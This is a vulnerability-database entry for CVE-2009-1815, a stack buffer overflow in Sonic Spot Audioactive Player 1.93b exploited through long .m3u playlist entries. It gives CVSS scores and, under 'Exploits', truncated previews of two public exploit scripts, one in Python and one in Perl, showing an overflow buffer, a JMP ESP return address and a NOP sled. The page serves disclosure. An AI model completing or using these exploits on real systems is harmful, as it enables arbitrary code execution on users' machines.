9.3
CVSSv2

CVE-2009-1815

Published: 29/05/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 940
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in Sonic Spot Audioactive Player 1.93b allows remote malicious users to execute arbitrary code via a long string in a playlist file, as demonstrated by a long .mp3 URL in a .m3u file.

Vulnerable Product Search on Vulmon Subscribe to Product

sonicspot audioactive player 1.93b

Exploits

#usage: exploitpy #Open the program then double clic in the exploit file print "**************************************************************************" print " Audioactive Player 193b (m3u) Local Buffer Overflow Exploit (SEH)\n" print " Credits : hack4love\n" print " Seh Exploit: His0k4\n" print " Tested on: Windows XP Pro SP3 (EN)\n" print ...
#!/usr/bin/perl # by hack4love # hack4love@hotmailcom # Audioactive player v193b (m3u) Local buffer Overflow Exploit # Greetz to all my friends # From EGYPT ################################################################## my $bof="\x41" x 224; my $ret="\xed\x1e\x94\x7c"; # JMP ESP ntdlldll my $nop="\x90" x 24; ################################ ...